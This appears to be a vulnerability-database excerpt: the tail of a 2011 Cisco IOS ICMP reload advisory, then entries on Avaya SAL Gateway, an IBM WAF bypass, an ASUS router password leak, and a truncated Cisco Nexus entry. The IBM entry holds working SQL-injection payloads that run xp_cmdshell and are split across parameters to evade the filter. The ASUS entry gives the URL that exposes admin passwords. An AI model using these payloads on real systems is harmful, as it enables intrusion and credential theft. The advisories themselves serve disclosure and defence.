The following example identifies a Cisco product that is running Cisco IOS Software Release 15.0(1)M1 with an installed image name of C3900-UNIVERSALK9-M:

    Router> show version
    Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), Version 15.0(1)M1, RELEASE SOFTWARE (fc1)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2009 by Cisco Systems, Inc.
    Compiled Wed 02-Dec-09 17:17 by prod_rel_team

    !--- output truncated

Additional information about Cisco IOS Software release naming conventions is available in the white paper Cisco IOS and NX-OS Software Reference Guide available at: http://www.cisco.com/web/about/security/intelligence/ios-ref.html.

Products Confirmed Not Vulnerable
+--------------------------------

Cisco IOS XR Software is not affected by this vulnerability. Cisco IOS XE Software is not affected by this vulnerability. No other Cisco products are currently known to be affected by this vulnerability.

Traffic destined to the device or transit traffic could trigger the effects of this vulnerability.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss

* CSCtk62453 ("Certain ICMP packets may cause device to reload")

CVSS Base Score - 7.8
    Access Vector - Network
    Access Complexity - Low
    Authentication - None
    Confidentiality Impact - None
    Integrity Impact - None
    Availability Impact - Complete

CVSS Temporal Score - 6.4
    Exploitability - Functional
    Remediation Level - Official-Fix
    Report Confidence - Confirmed

Impact
======

Successful exploitation of this vulnerability could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

Additionally, the Cisco IOS Software Checker is available on the Cisco Security Intelligence Operations (SIO) portal at http://tools.cisco.com/security/center/selectIOSVersion.x. It provides several features for checking which Security Advisories affect specified versions of Cisco IOS Software.

Cisco IOS Software
+-----------------

Each row of the following Cisco IOS Software table corresponds to a Cisco IOS Software train.
If a particular train is vulnerable, the earliest releases that contain the fix are listed in the First Fixed Release For This Advisory column. The First Fixed Release for All Advisories in the September 2011 Bundled Publication column lists the earliest possible releases that correct all the published vulnerabilities in the Cisco IOS Software Security Advisory bundled publication. Cisco recommends upgrading to the latest available release, where possible. +------------------------------------------------------------+ | Major | Availability of Repaired Releases | | Release | | |------------+-----------------------------------------------| | Affected | | First Fixed Release for | | 12.0-Based | First Fixed | All Advisories in the | | Releases | Release | September 2011 Bundled | | | | Publication | |------------------------------------------------------------| | There are no affected 12.0 based releases | |------------------------------------------------------------| | Affected | | First Fixed Release for | | 12.1-Based | First Fixed | All Advisories in the | | Releases | Release | September 2011 Bundled | | | | Publication | |------------------------------------------------------------| | There are no affected 12.1 based releases | |------------------------------------------------------------| | Affected | | First Fixed Release for | | 12.2-Based | First Fixed | All Advisories in the | | Releases | Release | September 2011 Bundled | | | | Publication | |------------+------------------+----------------------------| | 12.2 | Not vulnerable | Vulnerable; First fixed in | | | | Release 12.4 | |------------+------------------+----------------------------| | 12.2B | Not vulnerable | Vulnerable; First fixed in | | | | Release 12.4 | |------------+------------------+----------------------------| | 12.2BC | Not vulnerable | Vulnerable; First fixed in | | | | Release 12.4 | |------------+------------------+----------------------------| | 12.2BW | Not vulnerable | Not 
vulnerable | |------------+------------------+----------------------------| | 12.2BX | Not vulnerable | Vulnerable; First fixed in | | | | Release 12.2SB | |------------+------------------+----------------------------| | 12.2BY | Not vulnerable | Not vulnerable | |------------+------------------+----------------------------| | 12.2BZ | Not vulnerable | Not vulnerable | |------------+------------------+----------------------------| | 12.2CX | Not vulnerable | Vulnerable; First fixed in | | | | Release 12.4 | |------------+------------------+----------------------------| | 12.2CY | Not vulnerable | Not vulnerable | |------------+------------------+----------------------------| | 12.2CZ | Not vulnerable | Vulnerable; First fixed in | | | | Release 12.2SB | |------------+------------------+----------------------------| | 12.2DA | Not vulnerable | Not vulnerable | |------------+------------------+----------------------------| | 12.2DD | Not vulnerable | Not vulnerable | |------------+------------------+----------------------------| | 12.2DX | Not vulnerable | Not vulnerable | |------------+------------------+----------------------------| | 12.2EU | Not vulnerable | Not vulnerable | |------------+------------------+----------------------------| | | | Releases up to and | | 12.2EW | Not vulnerable | including 12.2(20)EW4 are | | | | not vulnerable. | |------------+------------------+----------------------------| | | | Vulnerable; contact your | | | | support organization per | | 12.2EWA | Not vulnerable | the instructions in the | | | | Obtaining Fixed Software | | | | section of this advisory. 
| |------------+------------------+----------------------------| | 12.2EX | Not vulnerable | 12.2(55)EX3 | |------------+------------------+----------------------------| | 12.2EY | Not vulnerable | 12.2(58)EY | |------------+------------------+----------------------------| | 12.2EZ | Not vulnerable | Vulnerable; migrate to any | | | | release in 15.0SE | |------------+------------------+----------------------------| | 12.2FX | Not vulnerable | Vulnerable; First fixed in | | | | Release 12.2SE | |------------+------------------+----------------------------| | 12.2FY | Not vulnerable | Vulnerable; First fixed in | | | | Release 12.2EX | |------------+------------------+----------------------------| | 12.2FZ | Not vulnerable | Vulnerable; First fixed in | | | | Release 12.2SE | |------------+------------------+----------------------------| | 12.2IRA | Not vulnerable | Vulnerable; migrate to any | | | | release in 12.2IRG | |------------+------------------+----------------------------| | 12.2IRB | Not vulnerable | Vulnerable; migrate to any | | | | release in 12.2IRG | |------------+------------------+----------------------------| | 12.2IRC | Not vulnerable | Vulnerable; migrate to any | | | | release in 12.2IRG | |------------+------------------+----------------------------| | | | Vulnerable; contact your | | | | support organization per | | 12.2IRD | Not vulnerable | the instructions in the | | | | Obtaining Fixed Software | | | | section of this advisory. | |------------+------------------+----------------------------| | | | Vulnerable; contact your | | | | support organization per | | 12.2IRE | Not vulnerable | the instructions in the | | | | Obtaining Fixed Software | | | | section of this advisory. 
| |------------+------------------+----------------------------| | 12.2IRF | Not vulnerable | Vulnerable; migrate to any | | | | release in 12.2IRG | |------------+------------------+----------------------------| | 12.2IRG | Not vulnerable | Not vulnerable | |------------+------------------+----------------------------| | | | Vulnerable; contact your | | | | support organization per | | 12.2IXA | Not vulnerable | the instructions in the | | | | Obtaining Fixed Software | | | | section of this advisory. | |------------+------------------+----------------------------| | | | Vulnerable; contact your | | | | support organization per | | 12.2IXB | Not vulnerable | the instructions in the | | | | Obtaining Fixed Software | | | | section of this advisory. | |------------+------------------+----------------------------| | | | Vulnerable; contact your | | | | support organization per | | 12.2IXC | Not vulnerable | the instructions in the | | | | Obtaining Fixed Software | | | | section of this advisory. | |------------+------------------+----------------------------| | | | Vulnerable; contact your | | | | support organization per | | 12.2IXD | Not vulnerable | the instructions in the | | | | Obtaining Fixed Software | | | | section of this advisory. | |------------+------------------+----------------------------| | | | Vulnerable; contact your | | | | support organization per | | 12.2IXE | Not vulnerable | the instructions in the | | | | Obtaining Fixed Software | | | | section of this advisory. | |------------+------------------+----------------------------| | | | Vulnerable; contact your | | | | support organization per | | 12.2IXF | Not vulnerable | the instructions in the | | | | Obtaining Fixed Software | | | | section of this advisory. 
| 12.2IXG | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2IXH | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2JA | Not vulnerable | Not vulnerable |
| 12.2JK | Not vulnerable | Not vulnerable |
| 12.2MB | Not vulnerable | Not vulnerable |
| 12.2MC | Not vulnerable | Vulnerable; First fixed in Release 12.4 |
| 12.2MRA | Not vulnerable | Vulnerable; First fixed in Release 12.2SRD |
| 12.2MRB | Not vulnerable | 12.2(33)MRB5 |
| 12.2S | Not vulnerable | 12.2(30)S are vulnerable; Releases 12.2(30)S and later are not vulnerable. First fixed in Release 12.2SB |
| 12.2SB | Releases prior to 12.2(31)SB18 and 12.2(33)SB9 are not vulnerable. 12.2(33)SB10 | 12.2(31)SB20, 12.2(33)SB10 |
| 12.2SBC | Not vulnerable | Vulnerable; First fixed in Release 12.2SB |
| 12.2SCA | Not vulnerable | Vulnerable; First fixed in Release 12.2SCC |
| 12.2SCB | Not vulnerable | Vulnerable; First fixed in Release 12.2SCC |
| 12.2SCC | Not vulnerable | 12.2(33)SCC7 |
| 12.2SCD | Not vulnerable | 12.2(33)SCD6 |
| 12.2SCE | Not vulnerable | 12.2(33)SCE1, 12.2(33)SCE2 |
| 12.2SCF | Not vulnerable | Not vulnerable |
| 12.2SE | Not vulnerable | 12.2(55)SE3, 12.2(58)SE |
| 12.2SEA | Not vulnerable | Vulnerable; First fixed in Release 12.2SE |
| 12.2SEB | Not vulnerable | Vulnerable; First fixed in Release 12.2SE |
| 12.2SEC | Not vulnerable | Vulnerable; First fixed in Release 12.2SE |
| 12.2SED | Not vulnerable | Vulnerable; First fixed in Release 12.2SE |
| 12.2SEE | Not vulnerable | Vulnerable; First fixed in Release 12.2SE |
| 12.2SEF | Not vulnerable | Vulnerable; First fixed in Release 12.2SE |
| 12.2SEG | Not vulnerable | Releases prior to 12.2(25)SEG4 are vulnerable; Releases 12.2(25)SEG4 and later are not vulnerable. First fixed in Release 12.2EX |
| 12.2SG | Not vulnerable | Releases prior to 12.2(53)SG4 are vulnerable; Releases 12.2(53)SG4 and later are not vulnerable. |
| 12.2SGA | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2SL | Not vulnerable | Not vulnerable |
| 12.2SM | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2SO | Not vulnerable | Not vulnerable |
| 12.2SQ | Not vulnerable | 12.2(50)SQ3 |
| 12.2SRA | Not vulnerable | Vulnerable; First fixed in Release 12.2SRD |
| 12.2SRB | Not vulnerable | Vulnerable; First fixed in Release 12.2SRD |
| 12.2SRC | Not vulnerable | Vulnerable; First fixed in Release 12.2SRD |
| 12.2SRD | Not vulnerable | 12.2(33)SRD6 |
| 12.2SRE | Not vulnerable | 12.2(33)SRE4 |
| 12.2STE | Not vulnerable | Not vulnerable |
| 12.2SU | Not vulnerable | Vulnerable; First fixed in Release 12.4 |
| 12.2SV | Not vulnerable | Releases prior to 12.2(29a)SV are vulnerable; Releases 12.2(29a)SV and later are not vulnerable. Migrate to any release in 12.2SVD |
| 12.2SVA | Not vulnerable | Not vulnerable |
| 12.2SVC | Not vulnerable | Not vulnerable |
| 12.2SVD | Not vulnerable | Not vulnerable |
| 12.2SVE | Not vulnerable | Not vulnerable |
| 12.2SW | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2SX | Not vulnerable | Vulnerable; First fixed in Release 12.2SXF |
| 12.2SXA | Not vulnerable | Vulnerable; First fixed in Release 12.2SXF |
| 12.2SXB | Not vulnerable | Vulnerable; First fixed in Release 12.2SXF |
| 12.2SXD | Not vulnerable | Vulnerable; First fixed in Release 12.2SXF |
| 12.2SXE | Not vulnerable | Vulnerable; First fixed in Release 12.2SXF |
| 12.2SXF | Not vulnerable | 12.2(18)SXF17b |
| 12.2SXH | Not vulnerable | 12.2(33)SXH8a |
| 12.2SXI | Not vulnerable | 12.2(33)SXI6 |
| 12.2SXJ | Not vulnerable | Not vulnerable |
| 12.2SY | Not vulnerable | 12.2(50)SY |
| 12.2SZ | Not vulnerable | Vulnerable; First fixed in Release 12.2SB |
| 12.2T | Not vulnerable | Vulnerable; First fixed in Release 12.4 |
| 12.2TPC | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2XA | Not vulnerable | Not vulnerable |
| 12.2XB | Not vulnerable | Vulnerable; First fixed in Release 12.4 |
| 12.2XC | Not vulnerable | Not vulnerable |
| 12.2XD | Not vulnerable | Not vulnerable |
| 12.2XE | Not vulnerable | Not vulnerable |
| 12.2XF | Not vulnerable | Not vulnerable |
| 12.2XG | Not vulnerable | Not vulnerable |
| 12.2XH | Not vulnerable | Not vulnerable |
| 12.2XI | Not vulnerable | Not vulnerable |
| 12.2XJ | Not vulnerable | Not vulnerable |
| 12.2XK | Not vulnerable | Not vulnerable |
| 12.2XL | Not vulnerable | Not vulnerable |
| 12.2XM | Not vulnerable | Not vulnerable |
| 12.2XN | Not vulnerable | Not vulnerable |
| 12.2XNA | Please see Cisco IOS-XE Software Availability | Please see Cisco IOS-XE Software Availability |
| 12.2XNB | Please see Cisco IOS-XE Software Availability | Please see Cisco IOS-XE Software Availability |
| 12.2XNC | Please see Cisco IOS-XE Software Availability | Please see Cisco IOS-XE Software Availability |
| 12.2XND | Please see Cisco IOS-XE Software Availability | Please see Cisco IOS-XE Software Availability |
| 12.2XNE | Please see Cisco IOS-XE Software Availability | Please see Cisco IOS-XE Software Availability |
| 12.2XNF | Please see Cisco IOS-XE Software Availability | Please see Cisco IOS-XE Software Availability |
| 12.2XO | Not vulnerable | Releases prior to 12.2(54)XO are vulnerable; Releases 12.2(54)XO and later are not vulnerable. |
| 12.2XQ | Not vulnerable | Not vulnerable |
| 12.2XR | Not vulnerable | Not vulnerable |
| 12.2XS | Not vulnerable | Not vulnerable |
| 12.2XT | Not vulnerable | Not vulnerable |
| 12.2XU | Not vulnerable | Not vulnerable |
| 12.2XV | Not vulnerable | Not vulnerable |
| 12.2XW | Not vulnerable | Not vulnerable |
| 12.2YA | Not vulnerable | Vulnerable; First fixed in Release 12.4 |
| 12.2YB | Not vulnerable | Not vulnerable |
| 12.2YC | Not vulnerable | Not vulnerable |
| 12.2YD | Not vulnerable | Not vulnerable |
| 12.2YE | Not vulnerable | Not vulnerable |
| 12.2YF | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YG | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YH | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YJ | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YK | Not vulnerable | Not vulnerable |
| 12.2YL | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YM | Not vulnerable | Vulnerable; First fixed in Release 12.4 |
| 12.2YN | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YO | Not vulnerable | Not vulnerable |
| 12.2YP | Not vulnerable | Not vulnerable |
| 12.2YQ | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YR | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YS | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YT | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YU | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YV | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YW | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YX | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YY | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YZ | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2ZA | Not vulnerable | Vulnerable; First fixed in Release 12.2SXF |
| 12.2ZB | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2ZC | Not vulnerable | Not vulnerable |
| 12.2ZD | Not vulnerable | Not vulnerable |
| 12.2ZE | Not vulnerable | Vulnerable; First fixed in Release 12.4 |
| 12.2ZF | Not vulnerable | Vulnerable; First fixed in Release 12.4 |
| 12.2ZG | Not vulnerable | Not vulnerable |
| 12.2ZH | Not vulnerable | Vulnerable; First fixed in Release 12.4 |
| 12.2ZJ | Not vulnerable | Not vulnerable |
| 12.2ZL | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2ZP | Not vulnerable | Not vulnerable |
| 12.2ZU | Not vulnerable | Vulnerable; First fixed in Release 12.2SXH |
| 12.2ZX | Not vulnerable | Not vulnerable |
| 12.2ZY | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2ZYA | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
|------------+------------------+----------------------------|
| Affected 12.3-Based Releases | First Fixed Release | First Fixed Release for All Advisories in the September 2011 Bundled Publication |
|------------------------------------------------------------|
| There are no affected 12.3 based releases |
|------------------------------------------------------------|
| Affected 12.4-Based Releases | First Fixed Release | First Fixed Release for All Advisories in the September 2011 Bundled Publication |
|------------------------------------------------------------|
| There are no affected 12.4 based releases |
|------------------------------------------------------------|
| Affected 15.0-Based Releases | First Fixed Release | Bundle First Fixed Release |
|------------+------------------+----------------------------|
| 15.0M | Not vulnerable | 15.0(1)M7 |
| 15.0MR | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 15.0MRA | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 15.0S | 15.0(1)S3a | 15.0(1)S4 |
| 15.0SA | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 15.0SE | Not vulnerable | Not vulnerable |
| 15.0SG | Not vulnerable | Not vulnerable |
| 15.0XA | Not vulnerable | Vulnerable; First fixed in Release 15.1T |
| 15.0XO | Not vulnerable | Releases prior to 15.0(2)XO1 are vulnerable; Releases 15.0(2)XO1 and later are not vulnerable. |
|------------+------------------+----------------------------|
| Affected 15.1-Based Releases | First Fixed Release | First Fixed Release for All Advisories in the September 2011 Bundled Publication |
|------------+------------------+----------------------------|
| 15.1EY | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 15.1GC | Not vulnerable | Vulnerable; First fixed in Release 15.1T |
| 15.1M | Not vulnerable | 15.1(4)M2; Available on 30-SEP-11 |
| 15.1MR | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 15.1S | Not vulnerable | 15.1(2)S2, 15.1(3)S |
| 15.1T | Not vulnerable | 15.1(2)T4, 15.1(1)T4 on 8-Dec-2011 |
| 15.1XB | Not vulnerable | Vulnerable; First fixed in Release 15.1T |
|------------+------------------+----------------------------|
| Affected 15.2-Based Releases | First Fixed Release | First Fixed Release for All Advisories in the September 2011 Bundled Publication |
|------------------------------------------------------------|
| There are no affected 15.2 based releases |
+------------------------------------------------------------+

Cisco IOS XE Software
+--------------------

Cisco IOS XE Software is not affected by the vulnerability disclosed in this advisory.

Cisco IOS XR Software
+--------------------

Cisco IOS XR Software is not affected by the vulnerability disclosed in this advisory. Cisco IOS XR Software is not affected by the vulnerabilities disclosed in the September 28, 2011, Cisco IOS Software Security Advisory bundled publication.

Workarounds
===========

Traffic destined to the device or transit traffic could trigger the effects of this vulnerability. Subsequently, the only workaround available is to block ICMP packets destined to the affected device and all ICMP transit traffic.

Obtaining Fixed Software
========================

Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was discovered while troubleshooting a customer service request.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20110928-c10k.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================

+------------------------------------------------------------+
| Revision 1.0 | 2011-September-28 | Initial public release |
+------------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.

+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
VAR-201108-0204 CVE-2011-3008 Avaya Secure Access Link (SAL) Gateway information disclosure vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The default configuration of Avaya Secure Access Link (SAL) Gateway 1.5, 1.8, and 2.0 contains certain domain names in the Secondary Core Server URL and Secondary Remote Server URL fields, which allows remote attackers to obtain sensitive information by leveraging administrative access to these domain names, as demonstrated by alarm and log information. Secure Access Link (SAL) Gateway, provided by Avaya, contains an information disclosure vulnerability: there is a problem with its default settings during installation. Avaya has released the following vulnerability information: "These servers resolve to invalid domains and pose a security threat. Secondary Core Server URL should be same as the primary Core Server URL and Secondary Remote Server URL should be same as the primary Remote Server URL." Information such as logs may be sent to an unintended e-mail address. With this service there is no need to surrender free access; it allows you to initiate a communication connection from your own network and choose the best provider for your business. To exploit this vulnerability, an attacker would need a malicious email server with the 'secavaya.com' and 'secaxeda.com' domain names to get warnings and log information. Exploiting this issue may allow an attacker to access sensitive information that may aid in further attacks.
VAR-201108-0125 CVE-2011-3140 IBM Web Application Firewall Security Bypass Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
IBM Web Application Firewall, as used on the G400 IPS-G400-IB-1 and GX4004 IPS-GX4004-IB-2 appliances with update 31.030, does not properly handle query strings with multiple instances of the same parameter, which allows remote attackers to bypass intended intrusion prevention by dividing a dangerous parameter value into substrings, as demonstrated by a SQL statement that is split across multiple iid parameters and then sent to a .aspx file on an IIS web server. IBM Web Application Firewall is prone to a security-bypass vulnerability. Successfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions. Remote attackers can bypass preset intrusion defenses by splitting dangerous parameters into multiple substrings.
Versions affected: Tested against G400 IPS-G400-IB-1 (Intrusion Prevention Update: 2011-03-11 00:34:23 - version: 31.030) and GX4004 IPS-GX4004-IB-2 (Intrusion Prevention Update: 2011-03-10 23:49:15 - version: 31.030).
The issue occurs when an attacker submits repeated occurrences of the same parameter. The example shown below uses the following environment: a web environment using Microsoft IIS, ASP.NET technology and Microsoft SQL Server 2000, protected by the IBM Web Application Firewall.
http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell "ping 10.1.1.3" --
IIS with ASP.NET (and even pure ASP) technology will concatenate the contents of a parameter if multiple entries are part of the request.
http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell &iid= "ping 10.1.1.3" --
IIS with ASP.NET (and even pure ASP) technology will concatenate both entries of the iid parameter; however, it will include a comma "," between them, resulting in the following output being sent to the database.
'; EXEC master..xp_cmdshell , "ping 10.1.1.3" --
The request above will be identified and blocked (depending on configuration) by IBM Web Application Firewall, because it appears that "EXEC" and "xp_cmdshell" trigger an attack pattern. However, it is possible to split the value at all the spaces into multiple parameters. For example:
http://sitename/find_ta_def.aspx?id=2571&iid='; &iid= EXEC &iid= master..xp_cmdshell &iid= "ping 10.1.1.3" &iid= --
The above request will bypass the affected IBM Web Application Firewall, resulting in the following output being sent to the database.
'; , EXEC , master..xp_cmdshell , "ping 10.1.1.3" , --
However, the above SQL code will not be properly executed because of the commas inserted into the SQL query. To solve this situation we will use SQL comments.
http://sitename/find_ta_def.aspx?id=2571&iid='; /*&iid=1*/ EXEC /*&iid=1*/ master..xp_cmdshell /*&iid=1*/ "ping 10.1.1.3" /*&iid=1*/ --
The above request will bypass IBM Web Application Firewall, resulting in the following output being sent to the database, which is valid and working SQL code.
'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "ping 10.1.1.3" /*,1*/ --
The above code will execute the ping command on the Microsoft Windows backend, assuming the application was running with administrative privileges. This attack class is also sometimes referred to as HTTP Pollution Attack, HTTP Parameter Pollution (HPP) and HTTP Parameter Concatenation. The exploitability of this issue depends on the infrastructure technology (web server, development framework technology, etc.) being used.
Remediation Steps: IBM has released fixes to the above issue in the "Super Tuesday" patch released in June. Refer to the references section of the advisory for further information released by IBM.
Revision History:
04/07/11 - Vulnerability disclosed
06/16/11 - Patch released
06/21/11 - Advisory published
References: 1. http://www.iss.net/security_center/reference/vuln/HTTP_Parameter_Abuse.htm 2.
http://xforce.iss.net/xforce/xfdb/67178
VAR-201111-0176 CVE-2011-4497 ASUS RT-N56U Wireless Router 'QIS_wizard.htm' Password Information Disclosure Vulnerability CVSS V2: 3.3
CVSS V3: -
Severity: LOW
QIS_wizard.htm on the ASUS RT-N56U router with firmware before 1.0.1.4o allows remote attackers to obtain the administrator password via a flag=detect request. The RT-N56U provided by ASUS contains an administrative password disclosure vulnerability. The RT-N56U provided by ASUS is a gigabit-compatible wireless router. The RT-N56U contains a management password disclosure vulnerability because authentication is not required to connect to the configuration page that contains the device's management password. Note that, by default, only users within the LAN can connect to this device. An administrative password may be obtained by a remote third party. An attacker with access to the device can access the http://RouterIPAddress/QIS_wizard.htm?flag=detect page. An attacker can obtain device configuration without entering login credentials. This web page will display the device administrator password. By default, only clients connected to the local area network (LAN) are allowed to access the system web interface. ASUS RT-N56U firmware version 1.0.1.4 is vulnerable.
TITLE: ASUS RT-N56U Wireless Router "QIS_wizard.htm" Information Disclosure SECUNIA ADVISORY ID: SA45714 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45714/ RELEASE DATE: 2011-08-26 DESCRIPTION: A security issue has been reported in the Asus RT-N56U Wireless Router, which can be exploited by malicious people to disclose sensitive information. The security issue is caused due to the router not restricting access to a page displaying the device's configuration (QIS_wizard.htm?flag=detect) and can be exploited to disclose sensitive information including the device's administrative password. SOLUTION: Update to firmware version 1.0.1.4o PROVIDED AND/OR DISCOVERED BY: Plucky via US-CERT. ORIGINAL ADVISORY: US-CERT: http://www.kb.cert.org/vuls/id/200814
VAR-201110-0195 CVE-2011-2569 Cisco Nexus OS and Cisco Unified Computing System Vulnerability gained in

Related entries in the VARIoT exploits database: VAR-E-201110-0040
CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
